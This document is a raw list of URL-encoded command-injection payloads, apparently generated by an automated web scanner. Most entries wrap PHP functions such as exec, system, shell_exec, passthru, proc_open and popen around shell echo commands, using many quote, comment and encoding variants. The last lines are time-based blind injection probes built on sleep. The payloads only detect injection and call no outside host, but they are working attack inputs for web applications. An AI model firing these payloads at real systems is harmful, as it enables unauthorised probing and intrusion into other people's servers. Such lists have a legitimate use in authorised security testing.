+${exec(print(`echo%20ITAGSP\necho%20$((63%2B35))\necho%20ITAGSP\necho%20ITAGSP`)%3BITAGSP +${exec(print(`echo%20JFZDGZ`.`echo%20$((16%2B38))`.`echo%20JFZDGZ`.`echo%20JFZDGZ`)%3B%5C%5CJFZDGZ +${exec(print(`echo%20YYMYQB;echo%20$((54%2B65));echo%20YYMYQB;echo%20YYMYQB`)%3B%255C%255CYYMYQB +${exec(print(`echo%20QTLCRD%0aecho%20$((90%2B5))%0aecho%20QTLCRD%0aecho%20QTLCRD`)%3B%25255C%25255CQTLCRD +${exec(print(`echo%20QRLVMM\necho%20$((41%2B19))\necho%20QRLVMM\necho%20QRLVMM`)%3B%2525255C%2525255CQRLVMM +${exec(print(`echo%20XRESBN`.`echo%20$((9%2B10))`.`echo%20XRESBN`.`echo%20XRESBN`)%3B//XRESBN +${exec(print(`echo%20YFVAOJ;echo%20$((71%2B65));echo%20YFVAOJ;echo%20YFVAOJ`)%3B//YFVAOJ +${exec(print(`echo%20CPYIZR%0aecho%20$((58%2B63))%0aecho%20CPYIZR%0aecho%20CPYIZR`)%3B//CPYIZR +${exec(print(`echo%20UFJNMU\necho%20$((69%2B30))\necho%20UFJNMU\necho%20UFJNMU`)%3B//UFJNMU +${exec(print(`echo%20GKZRWD`.`echo%20$((93%2B76))`.`echo%20GKZRWD`.`echo%20GKZRWD`)%3B%23GKZRWD +${exec(print(`echo%20ASBMQM;echo%20$((65%2B46));echo%20ASBMQM;echo%20ASBMQM`)%3B%2523ASBMQM +${exec(print(`echo%20UZNHTA%0aecho%20$((79%2B41))%0aecho%20UZNHTA%0aecho%20UZNHTA`)%3B%252523UZNHTA +${exec(print(`echo%20TWZNTZ\necho%20$((85%2B67))\necho%20TWZNTZ\necho%20TWZNTZ`)%3B%25252523TWZNTZ +${exec(print(`echo%20BGHSSE`.`echo%20$((10%2B79))`.`echo%20BGHSSE`.`echo%20BGHSSE`)%3B.%22BGHSSE +${exec(print(`echo%20GYABGY;echo%20$((9%2B52));echo%20GYABGY;echo%20GYABGY`)%3B.%2522GYABGY +${exec(print(`echo%20HFMDNB%0aecho%20$((56%2B41))%0aecho%20HFMDNB%0aecho%20HFMDNB`)%3B.%252522HFMDNB +${exec(print(`echo%20KTGGNJ\necho%20$((80%2B87))\necho%20KTGGNJ\necho%20KTGGNJ`)%3B.%25252522KTGGNJ +${exec(print(`echo%20UGDXMC`.`echo%20$((12%2B69))`.`echo%20UGDXMC`.`echo%20UGDXMC`)%3B.%27UGDXMC +${exec(print(`echo%20CHWXXR;echo%20$((19%2B13));echo%20CHWXXR;echo%20CHWXXR`)%3B.%2527CHWXXR +${exec(print(`echo%20OHFTIA%0aecho%20$((97%2B31))%0aecho%20OHFTIA%0aecho%20OHFTIA`)%3B.%252527OHFTIA +${exec(print(`echo%20JPKQMC\necho%20$((63%2B12))\necho%20JPKQMC\necho%20JPKQMC`)%3B.%25252527JPKQMC +${exec(print(`echo%20SRPMSX`.`echo%20$((59%2B33))`.`echo%20SRPMSX`.`echo%20SRPMSX`)%29%7DSRPMSX +${exec(print(`echo%20IHGVIP;echo%20$((98%2B57));echo%20IHGVIP;echo%20IHGVIP`)%3B%2529%257DIHGVIP +${exec(print(`echo%20LWNHYJ%0aecho%20$((0%2B21))%0aecho%20LWNHYJ%0aecho%20LWNHYJ`)%3B%252529%25257DLWNHYJ +${exec(print(`echo%20AOJPQW\necho%20$((18%2B92))\necho%20AOJPQW\necho%20AOJPQW`)%3B%25252529%2525257DAOJPQW +${system(print(`echo%20QIHVTW`.`echo%20$((76%2B48))`.`echo%20QIHVTW`.`echo%20QIHVTW`)%3BQIHVTW +${system(print(`echo%20YVOAMZ;echo%20$((9%2B69));echo%20YVOAMZ;echo%20YVOAMZ`)%3BYVOAMZ +${system(print(`echo%20EDIEDW%0aecho%20$((27%2B90))%0aecho%20EDIEDW%0aecho%20EDIEDW`)%3BEDIEDW +${system(print(`echo%20CTDUTJ\necho%20$((30%2B48))\necho%20CTDUTJ\necho%20CTDUTJ`)%3BCTDUTJ +${system(print(`echo%20CPHTNC`.`echo%20$((73%2B50))`.`echo%20CPHTNC`.`echo%20CPHTNC`)%3B%5C%5CCPHTNC +${system(print(`echo%20GVUXPA;echo%20$((23%2B14));echo%20GVUXPA;echo%20GVUXPA`)%3B%255C%255CGVUXPA +${system(print(`echo%20YHCDBT%0aecho%20$((19%2B19))%0aecho%20YHCDBT%0aecho%20YHCDBT`)%3B%25255C%25255CYHCDBT +${system(print(`echo%20LHBYTT\necho%20$((48%2B0))\necho%20LHBYTT\necho%20LHBYTT`)%3B%2525255C%2525255CLHBYTT +${system(print(`echo%20JJXLFR`.`echo%20$((84%2B45))`.`echo%20JJXLFR`.`echo%20JJXLFR`)%3B//JJXLFR +${system(print(`echo%20QXZKBZ;echo%20$((59%2B25));echo%20QXZKBZ;echo%20QXZKBZ`)%3B//QXZKBZ +${system(print(`echo%20MAFXYF%0aecho%20$((23%2B63))%0aecho%20MAFXYF%0aecho%20MAFXYF`)%3B//MAFXYF +${system(print(`echo%20LXHYXF\necho%20$((50%2B90))\necho%20LXHYXF\necho%20LXHYXF`)%3B//LXHYXF +${system(print(`echo%20XPECBV`.`echo%20$((14%2B77))`.`echo%20XPECBV`.`echo%20XPECBV`)%3B%23XPECBV +${system(print(`echo%20LWTWCT;echo%20$((98%2B35));echo%20LWTWCT;echo%20LWTWCT`)%3B%2523LWTWCT +${system(print(`echo%20RSGSZK%0aecho%20$((0%2B7))%0aecho%20RSGSZK%0aecho%20RSGSZK`)%3B%252523RSGSZK +${system(print(`echo%20MQQJPG\necho%20$((72%2B19))\necho%20MQQJPG\necho%20MQQJPG`)%3B%25252523MQQJPG +${system(print(`echo%20WJAMJI`.`echo%20$((95%2B52))`.`echo%20WJAMJI`.`echo%20WJAMJI`)%3B.%22WJAMJI +${system(print(`echo%20ARCVVC;echo%20$((7%2B90));echo%20ARCVVC;echo%20ARCVVC`)%3B.%2522ARCVVC +${system(print(`echo%20CKLWBH%0aecho%20$((38%2B7))%0aecho%20CKLWBH%0aecho%20CKLWBH`)%3B.%252522CKLWBH +${system(print(`echo%20CZASPT\necho%20$((18%2B64))\necho%20CZASPT\necho%20CZASPT`)%3B.%25252522CZASPT +${system(print(`echo%20TDEKPW`.`echo%20$((36%2B67))`.`echo%20TDEKPW`.`echo%20TDEKPW`)%3B.%27TDEKPW +${system(print(`echo%20FTPLBI;echo%20$((56%2B37));echo%20FTPLBI;echo%20FTPLBI`)%3B.%2527FTPLBI +${system(print(`echo%20RKLPMM%0aecho%20$((66%2B91))%0aecho%20RKLPMM%0aecho%20RKLPMM`)%3B.%252527RKLPMM +${system(print(`echo%20IWAAGD\necho%20$((70%2B17))\necho%20IWAAGD\necho%20IWAAGD`)%3B.%25252527IWAAGD +${system(print(`echo%20ZYLUET`.`echo%20$((5%2B56))`.`echo%20ZYLUET`.`echo%20ZYLUET`)%29%7DZYLUET +${system(print(`echo%20EZFNSE;echo%20$((38%2B74));echo%20EZFNSE;echo%20EZFNSE`)%3B%2529%257DEZFNSE +${system(print(`echo%20DDVDPM%0aecho%20$((1%2B17))%0aecho%20DDVDPM%0aecho%20DDVDPM`)%3B%252529%25257DDDVDPM +${system(print(`echo%20YYSFAL\necho%20$((70%2B5))\necho%20YYSFAL\necho%20YYSFAL`)%3B%25252529%2525257DYYSFAL +${shell_exec(print(`echo%20FDGAHQ`.`echo%20$((87%2B87))`.`echo%20FDGAHQ`.`echo%20FDGAHQ`)%3BFDGAHQ +${shell_exec(print(`echo%20OAPDKW;echo%20$((19%2B47));echo%20OAPDKW;echo%20OAPDKW`)%3BOAPDKW +${shell_exec(print(`echo%20NTILFZ%0aecho%20$((24%2B1))%0aecho%20NTILFZ%0aecho%20NTILFZ`)%3BNTILFZ +${shell_exec(print(`echo%20LTJDND\necho%20$((85%2B41))\necho%20LTJDND\necho%20LTJDND`)%3BLTJDND +${shell_exec(print(`echo%20NSLPBW`.`echo%20$((95%2B54))`.`echo%20NSLPBW`.`echo%20NSLPBW`)%3B%5C%5CNSLPBW +${shell_exec(print(`echo%20MVSQEI;echo%20$((38%2B17));echo%20MVSQEI;echo%20MVSQEI`)%3B%255C%255CMVSQEI +${shell_exec(print(`echo%20VZXASO%0aecho%20$((97%2B88))%0aecho%20VZXASO%0aecho%20VZXASO`)%3B%25255C%25255CVZXASO +${shell_exec(print(`echo%20KRLQHL\necho%20$((37%2B53))\necho%20KRLQHL\necho%20KRLQHL`)%3B%2525255C%2525255CKRLQHL +${shell_exec(print(`echo%20CTGKDZ`.`echo%20$((66%2B54))`.`echo%20CTGKDZ`.`echo%20CTGKDZ`)%3B//CTGKDZ +${shell_exec(print(`echo%20EDDLOS;echo%20$((48%2B73));echo%20EDDLOS;echo%20EDDLOS`)%3B//EDDLOS +${shell_exec(print(`echo%20HULCYO%0aecho%20$((33%2B24))%0aecho%20HULCYO%0aecho%20HULCYO`)%3B//HULCYO +${shell_exec(print(`echo%20CVXUUB\necho%20$((15%2B41))\necho%20CVXUUB\necho%20CVXUUB`)%3B//CVXUUB +${shell_exec(print(`echo%20SICOKB`.`echo%20$((59%2B30))`.`echo%20SICOKB`.`echo%20SICOKB`)%3B%23SICOKB +${shell_exec(print(`echo%20EINNUI;echo%20$((9%2B15));echo%20EINNUI;echo%20EINNUI`)%3B%2523EINNUI +${shell_exec(print(`echo%20FBJSWR%0aecho%20$((91%2B71))%0aecho%20FBJSWR%0aecho%20FBJSWR`)%3B%252523FBJSWR +${shell_exec(print(`echo%20QQZSXU\necho%20$((69%2B44))\necho%20QQZSXU\necho%20QQZSXU`)%3B%25252523QQZSXU +${shell_exec(print(`echo%20ZEVNBY`.`echo%20$((97%2B49))`.`echo%20ZEVNBY`.`echo%20ZEVNBY`)%3B.%22ZEVNBY +${shell_exec(print(`echo%20WBZBZE;echo%20$((19%2B87));echo%20WBZBZE;echo%20WBZBZE`)%3B.%2522WBZBZE +${shell_exec(print(`echo%20KIACLJ%0aecho%20$((8%2B79))%0aecho%20KIACLJ%0aecho%20KIACLJ`)%3B.%252522KIACLJ +${shell_exec(print(`echo%20NHQIAE\necho%20$((63%2B50))\necho%20NHQIAE\necho%20NHQIAE`)%3B.%25252522NHQIAE +${shell_exec(print(`echo%20CKFBET`.`echo%20$((33%2B76))`.`echo%20CKFBET`.`echo%20CKFBET`)%3B.%27CKFBET +${shell_exec(print(`echo%20BMQBVJ;echo%20$((82%2B52));echo%20BMQBVJ;echo%20BMQBVJ`)%3B.%2527BMQBVJ +${shell_exec(print(`echo%20VEKGIY%0aecho%20$((15%2B47))%0aecho%20VEKGIY%0aecho%20VEKGIY`)%3B.%252527VEKGIY +${shell_exec(print(`echo%20VBRHZS\necho%20$((17%2B48))\necho%20VBRHZS\necho%20VBRHZS`)%3B.%25252527VBRHZS +${shell_exec(print(`echo%20PWWUEN`.`echo%20$((49%2B57))`.`echo%20PWWUEN`.`echo%20PWWUEN`)%29%7DPWWUEN +${shell_exec(print(`echo%20OYNPCP;echo%20$((84%2B51));echo%20OYNPCP;echo%20OYNPCP`)%3B%2529%257DOYNPCP +${shell_exec(print(`echo%20DPVESG%0aecho%20$((76%2B66))%0aecho%20DPVESG%0aecho%20DPVESG`)%3B%252529%25257DDPVESG +${shell_exec(print(`echo%20RJFPQU\necho%20$((15%2B60))\necho%20RJFPQU\necho%20RJFPQU`)%3B%25252529%2525257DRJFPQU +${passthru(print(`echo%20NLYULT`.`echo%20$((55%2B80))`.`echo%20NLYULT`.`echo%20NLYULT`)%3BNLYULT +${passthru(print(`echo%20CLQQRV;echo%20$((21%2B24));echo%20CLQQRV;echo%20CLQQRV`)%3BCLQQRV +${passthru(print(`echo%20TYDNLL%0aecho%20$((23%2B29))%0aecho%20TYDNLL%0aecho%20TYDNLL`)%3BTYDNLL +${passthru(print(`echo%20ZKPFXS\necho%20$((3%2B17))\necho%20ZKPFXS\necho%20ZKPFXS`)%3BZKPFXS +${passthru(print(`echo%20CGIUOF`.`echo%20$((1%2B49))`.`echo%20CGIUOF`.`echo%20CGIUOF`)%3B%5C%5CCGIUOF +${passthru(print(`echo%20JRXXWA;echo%20$((92%2B68));echo%20JRXXWA;echo%20JRXXWA`)%3B%255C%255CJRXXWA +${passthru(print(`echo%20KXVPHA%0aecho%20$((20%2B43))%0aecho%20KXVPHA%0aecho%20KXVPHA`)%3B%25255C%25255CKXVPHA +${passthru(print(`echo%20OLJESC\necho%20$((53%2B40))\necho%20OLJESC\necho%20OLJESC`)%3B%2525255C%2525255COLJESC +${passthru(print(`echo%20XGEVDG`.`echo%20$((58%2B30))`.`echo%20XGEVDG`.`echo%20XGEVDG`)%3B//XGEVDG +${passthru(print(`echo%20DBDIBN;echo%20$((7%2B5));echo%20DBDIBN;echo%20DBDIBN`)%3B//DBDIBN +${passthru(print(`echo%20NSBWMT%0aecho%20$((16%2B44))%0aecho%20NSBWMT%0aecho%20NSBWMT`)%3B//NSBWMT +${passthru(print(`echo%20EWDATZ\necho%20$((58%2B44))\necho%20EWDATZ\necho%20EWDATZ`)%3B//EWDATZ +${passthru(print(`echo%20OAAISJ`.`echo%20$((72%2B52))`.`echo%20OAAISJ`.`echo%20OAAISJ`)%3B%23OAAISJ +${passthru(print(`echo%20PYELUB;echo%20$((29%2B64));echo%20PYELUB;echo%20PYELUB`)%3B%2523PYELUB +${passthru(print(`echo%20FHTLVG%0aecho%20$((8%2B87))%0aecho%20FHTLVG%0aecho%20FHTLVG`)%3B%252523FHTLVG +${passthru(print(`echo%20QPYRBQ\necho%20$((35%2B79))\necho%20QPYRBQ\necho%20QPYRBQ`)%3B%25252523QPYRBQ +${passthru(print(`echo%20UOUNQT`.`echo%20$((2%2B66))`.`echo%20UOUNQT`.`echo%20UOUNQT`)%3B.%22UOUNQT +${passthru(print(`echo%20HRCXNG;echo%20$((6%2B10));echo%20HRCXNG;echo%20HRCXNG`)%3B.%2522HRCXNG +${passthru(print(`echo%20KRUYIM%0aecho%20$((16%2B77))%0aecho%20KRUYIM%0aecho%20KRUYIM`)%3B.%252522KRUYIM +${passthru(print(`echo%20CSYNWP\necho%20$((93%2B10))\necho%20CSYNWP\necho%20CSYNWP`)%3B.%25252522CSYNWP +${passthru(print(`echo%20RBCHID`.`echo%20$((71%2B83))`.`echo%20RBCHID`.`echo%20RBCHID`)%3B.%27RBCHID +${passthru(print(`echo%20XUWNEP;echo%20$((61%2B20));echo%20XUWNEP;echo%20XUWNEP`)%3B.%2527XUWNEP +${passthru(print(`echo%20QKCAAG%0aecho%20$((61%2B22))%0aecho%20QKCAAG%0aecho%20QKCAAG`)%3B.%252527QKCAAG +${passthru(print(`echo%20EGTRQH\necho%20$((17%2B5))\necho%20EGTRQH\necho%20EGTRQH`)%3B.%25252527EGTRQH +${passthru(print(`echo%20DAORGO`.`echo%20$((65%2B75))`.`echo%20DAORGO`.`echo%20DAORGO`)%29%7DDAORGO +${passthru(print(`echo%20CYGOXX;echo%20$((41%2B31));echo%20CYGOXX;echo%20CYGOXX`)%3B%2529%257DCYGOXX +${passthru(print(`echo%20OSWWFT%0aecho%20$((92%2B42))%0aecho%20OSWWFT%0aecho%20OSWWFT`)%3B%252529%25257DOSWWFT +${passthru(print(`echo%20OVSNXT\necho%20$((21%2B17))\necho%20OVSNXT\necho%20OVSNXT`)%3B%25252529%2525257DOVSNXT +${proc_open(print(`echo%20TIYJYD`.`echo%20$((86%2B26))`.`echo%20TIYJYD`.`echo%20TIYJYD`)%3BTIYJYD +${proc_open(print(`echo%20XAKQYF;echo%20$((41%2B51));echo%20XAKQYF;echo%20XAKQYF`)%3BXAKQYF +${proc_open(print(`echo%20WMSMFM%0aecho%20$((4%2B30))%0aecho%20WMSMFM%0aecho%20WMSMFM`)%3BWMSMFM +${proc_open(print(`echo%20FCANMP\necho%20$((61%2B35))\necho%20FCANMP\necho%20FCANMP`)%3BFCANMP +${proc_open(print(`echo%20BUFRZN`.`echo%20$((99%2B37))`.`echo%20BUFRZN`.`echo%20BUFRZN`)%3B%5C%5CBUFRZN +${proc_open(print(`echo%20SKXDUS;echo%20$((67%2B97));echo%20SKXDUS;echo%20SKXDUS`)%3B%255C%255CSKXDUS +${proc_open(print(`echo%20SQZPMJ%0aecho%20$((94%2B63))%0aecho%20SQZPMJ%0aecho%20SQZPMJ`)%3B%25255C%25255CSQZPMJ +${proc_open(print(`echo%20ZMUKGP\necho%20$((9%2B61))\necho%20ZMUKGP\necho%20ZMUKGP`)%3B%2525255C%2525255CZMUKGP +${proc_open(print(`echo%20KDOEOK`.`echo%20$((74%2B18))`.`echo%20KDOEOK`.`echo%20KDOEOK`)%3B//KDOEOK +${proc_open(print(`echo%20RTNMAU;echo%20$((3%2B92));echo%20RTNMAU;echo%20RTNMAU`)%3B//RTNMAU +${proc_open(print(`echo%20HEDLVC%0aecho%20$((95%2B18))%0aecho%20HEDLVC%0aecho%20HEDLVC`)%3B//HEDLVC +${proc_open(print(`echo%20KNDTDG\necho%20$((98%2B53))\necho%20KNDTDG\necho%20KNDTDG`)%3B//KNDTDG +${proc_open(print(`echo%20BBSVGQ`.`echo%20$((42%2B81))`.`echo%20BBSVGQ`.`echo%20BBSVGQ`)%3B%23BBSVGQ +${proc_open(print(`echo%20LUFXAF;echo%20$((85%2B77));echo%20LUFXAF;echo%20LUFXAF`)%3B%2523LUFXAF +${proc_open(print(`echo%20BPIHJI%0aecho%20$((94%2B16))%0aecho%20BPIHJI%0aecho%20BPIHJI`)%3B%252523BPIHJI +${proc_open(print(`echo%20SRVISB\necho%20$((34%2B18))\necho%20SRVISB\necho%20SRVISB`)%3B%25252523SRVISB +${proc_open(print(`echo%20KZLOGK`.`echo%20$((4%2B23))`.`echo%20KZLOGK`.`echo%20KZLOGK`)%3B.%22KZLOGK +${proc_open(print(`echo%20MLSOYZ;echo%20$((72%2B12));echo%20MLSOYZ;echo%20MLSOYZ`)%3B.%2522MLSOYZ +${proc_open(print(`echo%20JXTIWP%0aecho%20$((97%2B60))%0aecho%20JXTIWP%0aecho%20JXTIWP`)%3B.%252522JXTIWP +${proc_open(print(`echo%20EBZMPW\necho%20$((54%2B99))\necho%20EBZMPW\necho%20EBZMPW`)%3B.%25252522EBZMPW +${proc_open(print(`echo%20CPKMZS`.`echo%20$((71%2B91))`.`echo%20CPKMZS`.`echo%20CPKMZS`)%3B.%27CPKMZS +${proc_open(print(`echo%20HWBQFG;echo%20$((79%2B43));echo%20HWBQFG;echo%20HWBQFG`)%3B.%2527HWBQFG +${proc_open(print(`echo%20TDPGNL%0aecho%20$((89%2B52))%0aecho%20TDPGNL%0aecho%20TDPGNL`)%3B.%252527TDPGNL +${proc_open(print(`echo%20JQUEEX\necho%20$((81%2B77))\necho%20JQUEEX\necho%20JQUEEX`)%3B.%25252527JQUEEX +${proc_open(print(`echo%20EALLNU`.`echo%20$((18%2B91))`.`echo%20EALLNU`.`echo%20EALLNU`)%29%7DEALLNU +${proc_open(print(`echo%20RMMUOG;echo%20$((61%2B62));echo%20RMMUOG;echo%20RMMUOG`)%3B%2529%257DRMMUOG +${proc_open(print(`echo%20TWETUM%0aecho%20$((82%2B35))%0aecho%20TWETUM%0aecho%20TWETUM`)%3B%252529%25257DTWETUM +${proc_open(print(`echo%20GSEIBK\necho%20$((71%2B35))\necho%20GSEIBK\necho%20GSEIBK`)%3B%25252529%2525257DGSEIBK +${popen(print(`echo%20VGNVLG`.`echo%20$((76%2B39))`.`echo%20VGNVLG`.`echo%20VGNVLG`)%3BVGNVLG +${popen(print(`echo%20IWFPXG;echo%20$((92%2B70));echo%20IWFPXG;echo%20IWFPXG`)%3BIWFPXG +${popen(print(`echo%20RWKSAH%0aecho%20$((18%2B34))%0aecho%20RWKSAH%0aecho%20RWKSAH`)%3BRWKSAH +${popen(print(`echo%20TBFYMH\necho%20$((44%2B94))\necho%20TBFYMH\necho%20TBFYMH`)%3BTBFYMH +${popen(print(`echo%20YYAFET`.`echo%20$((62%2B68))`.`echo%20YYAFET`.`echo%20YYAFET`)%3B%5C%5CYYAFET +${popen(print(`echo%20ATLEFF;echo%20$((90%2B9));echo%20ATLEFF;echo%20ATLEFF`)%3B%255C%255CATLEFF +${popen(print(`echo%20JDFWVW%0aecho%20$((92%2B86))%0aecho%20JDFWVW%0aecho%20JDFWVW`)%3B%25255C%25255CJDFWVW +${popen(print(`echo%20UQCXVD\necho%20$((60%2B78))\necho%20UQCXVD\necho%20UQCXVD`)%3B%2525255C%2525255CUQCXVD +${popen(print(`echo%20PBSYUK`.`echo%20$((49%2B23))`.`echo%20PBSYUK`.`echo%20PBSYUK`)%3B//PBSYUK +${popen(print(`echo%20UYCUPP;echo%20$((99%2B36));echo%20UYCUPP;echo%20UYCUPP`)%3B//UYCUPP +${popen(print(`echo%20AHQLIX%0aecho%20$((35%2B21))%0aecho%20AHQLIX%0aecho%20AHQLIX`)%3B//AHQLIX +${popen(print(`echo%20RWZIYD\necho%20$((45%2B92))\necho%20RWZIYD\necho%20RWZIYD`)%3B//RWZIYD +${popen(print(`echo%20XGFDZU`.`echo%20$((14%2B6))`.`echo%20XGFDZU`.`echo%20XGFDZU`)%3B%23XGFDZU +${popen(print(`echo%20VDXXJI;echo%20$((50%2B12));echo%20VDXXJI;echo%20VDXXJI`)%3B%2523VDXXJI +${popen(print(`echo%20UWOAFS%0aecho%20$((11%2B42))%0aecho%20UWOAFS%0aecho%20UWOAFS`)%3B%252523UWOAFS +${popen(print(`echo%20KCHOPX\necho%20$((77%2B78))\necho%20KCHOPX\necho%20KCHOPX`)%3B%25252523KCHOPX +${popen(print(`echo%20PBZYGX`.`echo%20$((38%2B4))`.`echo%20PBZYGX`.`echo%20PBZYGX`)%3B.%22PBZYGX +${popen(print(`echo%20FRWTRM;echo%20$((11%2B41));echo%20FRWTRM;echo%20FRWTRM`)%3B.%2522FRWTRM +${popen(print(`echo%20LSIFOR%0aecho%20$((86%2B39))%0aecho%20LSIFOR%0aecho%20LSIFOR`)%3B.%252522LSIFOR +${popen(print(`echo%20FJKMCS\necho%20$((43%2B2))\necho%20FJKMCS\necho%20FJKMCS`)%3B.%25252522FJKMCS +${popen(print(`echo%20XZRRJD`.`echo%20$((95%2B86))`.`echo%20XZRRJD`.`echo%20XZRRJD`)%3B.%27XZRRJD +${popen(print(`echo%20MVEAQD;echo%20$((64%2B58));echo%20MVEAQD;echo%20MVEAQD`)%3B.%2527MVEAQD +${popen(print(`echo%20BZEAYT%0aecho%20$((11%2B35))%0aecho%20BZEAYT%0aecho%20BZEAYT`)%3B.%252527BZEAYT +${popen(print(`echo%20ZTPGAU\necho%20$((52%2B3))\necho%20ZTPGAU\necho%20ZTPGAU`)%3B.%25252527ZTPGAU +${popen(print(`echo%20LBEVLL`.`echo%20$((2%2B31))`.`echo%20LBEVLL`.`echo%20LBEVLL`)%29%7DLBEVLL +${popen(print(`echo%20BZLGPL;echo%20$((70%2B63));echo%20BZLGPL;echo%20BZLGPL`)%3B%2529%257DBZLGPL +${popen(print(`echo%20SLXBWN%0aecho%20$((29%2B57))%0aecho%20SLXBWN%0aecho%20SLXBWN`)%3B%252529%25257DSLXBWN +${popen(print(`echo%20QDXUDJ\necho%20$((17%2B75))\necho%20QDXUDJ\necho%20QDXUDJ`)%3B%25252529%2525257DQDXUDJ +%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%7C%20%5B%201%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%7C%20%5B%202%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%7C%20%5B%203%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%7C%20%5B%204%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%7C%20%5B%205%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%7C%20%5B%206%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%7C%20%5B%207%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%7C%20%5B%208%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%7C%20%5B%209%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 